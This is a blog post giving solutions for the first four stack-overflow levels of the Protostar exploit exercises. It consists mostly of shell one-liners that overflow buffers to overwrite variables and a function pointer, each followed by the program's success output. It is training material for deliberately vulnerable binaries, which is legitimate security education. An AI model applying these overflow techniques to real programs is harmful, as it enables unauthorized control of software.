Protostar Stack Exploits (Solutions 0-3)

Buffer overflow exploit exercises, part one.

Published on 18 August 2012


Protostar is a series of exercises from Exploit Exercises. In addition to three final levels, it has four basic sections: network programming, format strings, heap overflows, and stack overflows.

This series of posts contains solutions and walkthroughs for the stack overflow levels (“Stack”). It assumes basic knowledge of systems programming and is meant to serve as a reference for those stuck on certain levels.

This is the first of three posts for Stack. The first four levels are straightforward, and their corresponding posts contain little explanation (solutions). The last three levels have more potential pitfalls, and those posts contain more detailed explanations (walkthroughs).


Stack: Level 0

Description (full): Overwrite a variable on the stack.

$ perl -e "print 'a'x65" | ./stack0
you have changed the 'modified' variable

Stack: Level 1

Description (full): Overwrite a variable on the stack with a specific series of hex values.

$ ./stack1 $(perl -e "print 'a'x64 . dcba")
you have correctly got the variable to the right value

Stack: Level 2

Description (full): Overwrite a variable by using an environmental variable.

$ export GREENIE=$(echo -e "$(perl -e "print ax64")\n\r\n\r")
$ ./stack2
you have correctly modified the variable

Stack: Level 3

Description (full): Overwrite a function pointer.

$ objdump -d ./stack3 | grep win
08048424 <win>:
$ echo -e "$(perl -e "print 'a'x64")\x24\x84\x04\x08" | ./stack3
calling function pointer, jumping to 08048424
code flow successfully changed